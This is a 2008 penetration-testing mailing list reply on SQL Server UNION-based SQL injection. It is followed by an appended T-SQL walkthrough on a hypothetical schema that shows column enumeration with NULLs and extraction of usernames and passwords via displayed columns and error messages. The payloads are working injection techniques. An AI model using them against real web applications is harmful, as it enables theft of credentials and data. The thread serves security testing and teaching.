
Penetration Testing mailing list archives

Re: SQL Injection: Issue with UNION SELECT ALL
From: Francois Larouche <francois.larouche-ml () sqlpowerinjector com>
Date: Tue, 15 Jan 2008 10:44:52 -0800

Hi Zed,

See my answers inside the text.
> On Jan 11, 2008 12:16 AM, Francois Larouche
> <francois.larouche-ml () sqlpowerinjector com> wrote:
> > I wouldn't agree with your statement, Zed.
> >
> > What he found was where the first conversion clash occurred. It seems
> > that your third expression is a text field, no big deal. For some reason
> > SQL Server gives a higher priority to the "text is incompatible with int"
> > error, or any casting problem, than to the equal-number-of-expressions
> > error in a UNION clause. Believe me, I learned that at my expense...
>
> Chances are I misread your statement above, but what do you mean by
> "or any casting problem"?
> The nvarchar casting above/below works as expected.

I might not have said it right, but what I meant was that casting errors take precedence over the error which states that the UNION doesn't have the right number of expressions. Hence, someone might think that he has found the right number of expressions when in fact he is just hitting his first type clash. And of course a cast to nvarchar will work, but I was referring to your statement regarding the fact that he found, or seemed to have found, the right number of expressions (3) when in fact he got a casting problem. (See below.)

> > > you seem to have successfully enumerated the number of fields of the
> > > first query at
> > > ----------------------------------------------------------------------------------
> > > http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
> > > ALL 1,2,3--
> > >     Returns:
> > >     Operand type clash: text is incompatible with int
> >
> > The actual number is 16 if I counted well with his HAVING test.
> >
> > Your problem now, Joseph, is just to make sure that you can have the right
> > format. If you use NULL it will work each time; however, you won't get
> > anything back...
>
> Partly true - oh well, unless you found something else at your expense
> :). You just have to pick one column that is displayed back and put
> your data selection there if you want multiple data rows to be
> returned back. Alternatively pick an int column and union select
> strings on that. Detailed error messages - which you seem to have -
> will get you the data back one at a time. Recurse on that with NOT IN
> ('data'...)

This time it's my fault, I didn't explain very well what I meant by "if you use only NULL you'll get nothing back". What I meant was that if you just use SELECT * FROM SomeTable UNION SELECT NULL, NULL, NULL, NULL-- you'll get just the normal result, as if you hadn't used the UNION at all. The goal of using NULL is to be able to find out the exact number of expressions without having to bother with stupid casting or collation. Then, when you have the right number of expressions, you can use your trick or any other way you want to get information from the SQL Server.

Wish you well,

Cheers

Francois
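The probing sequence the two of them are describing, written out as an added T-SQL example that is not part of the original thread. The table and column names (Articles, Users, id/title/body, username/pwd), the rows, and the shape of the vulnerable query are all assumptions; the example also goes one step beyond the thread by carrying the NOT IN recursion through to its terminating case. Error message texts are SQL Server 2005 wording. UNION ALL is used throughout because a plain UNION applies DISTINCT, which SQL Server refuses on a text column.

```sql
-- Added example, not code from the original thread. Hypothetical schema;
-- assumes the vulnerable page builds, with <vulnparam> concatenated unescaped:
--   SELECT id, title, body FROM Articles WHERE id = <vulnparam>
CREATE TABLE Articles (id int, title varchar(50), body text);
INSERT INTO Articles VALUES (12345, 'Welcome', 'Some article body');

CREATE TABLE Users (username varchar(50), pwd varchar(50));
INSERT INTO Users VALUES ('alice', 's3cret');
INSERT INTO Users VALUES ('bob', 'hunter2');

-- 1. Guessing with literals. int outranks text in SQL Server's data type
--    precedence, so the UNION tries to convert the text column to int and
--    fails; this is Francois' point that the clash fires before the count
--    tells you anything useful:
--      Operand type clash: text is incompatible with int
SELECT id, title, body FROM Articles WHERE id = 12345 UNION ALL SELECT 1, 2, 3--

-- 2. Probing with NULL instead. NULL is compatible with every type, so the
--    only error left is the count mismatch:
--      All queries combined using a UNION, INTERSECT or EXCEPT operator
--      must have an equal number of expressions in their target lists.
SELECT id, title, body FROM Articles WHERE id = 12345 UNION ALL SELECT NULL--
SELECT id, title, body FROM Articles WHERE id = 12345 UNION ALL SELECT NULL, NULL--

--    Three NULLs succeed. As Francois says, you get nothing back beyond the
--    normal row plus one all-NULL row, but the count is now known to be 3.
SELECT id, title, body FROM Articles WHERE id = 12345 UNION ALL SELECT NULL, NULL, NULL--

-- 3a. Zed's first approach, when a column is displayed by the page: put the
--     data in a column whose type accepts it (title is varchar) and keep
--     NULL elsewhere. Returns the article row plus one row per user.
SELECT id, title, body FROM Articles WHERE id = 12345
UNION ALL SELECT NULL, username + ':' + pwd, NULL FROM Users--

-- 3b. Zed's second approach, when nothing is displayed but errors are
--     verbose: select a string into the int column. The UNION casts it to
--     int and the error message leaks one value per request:
--       Conversion failed when converting the varchar value 'alice'
--       to data type int.
SELECT id, title, body FROM Articles WHERE id = 12345
UNION ALL SELECT (SELECT TOP 1 username FROM Users ORDER BY username), NULL, NULL--

--     Recurse with NOT IN on the values seen so far. The subquery yields
--     'bob' here, and on the next round returns no row, i.e. NULL, which
--     casts to int without error: the absence of an error ends the loop.
SELECT id, title, body FROM Articles WHERE id = 12345
UNION ALL SELECT (SELECT TOP 1 username FROM Users
                  WHERE username NOT IN ('alice') ORDER BY username), NULL, NULL--

SELECT id, title, body FROM Articles WHERE id = 12345
UNION ALL SELECT (SELECT TOP 1 username FROM Users
                  WHERE username NOT IN ('alice', 'bob') ORDER BY username), NULL, NULL--
```

The ORDER BY inside the TOP 1 subqueries is there only to make the enumeration deterministic; without it SQL Server may return rows in any order, and the NOT IN list still works but the sequence of leaked values is not predictable.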

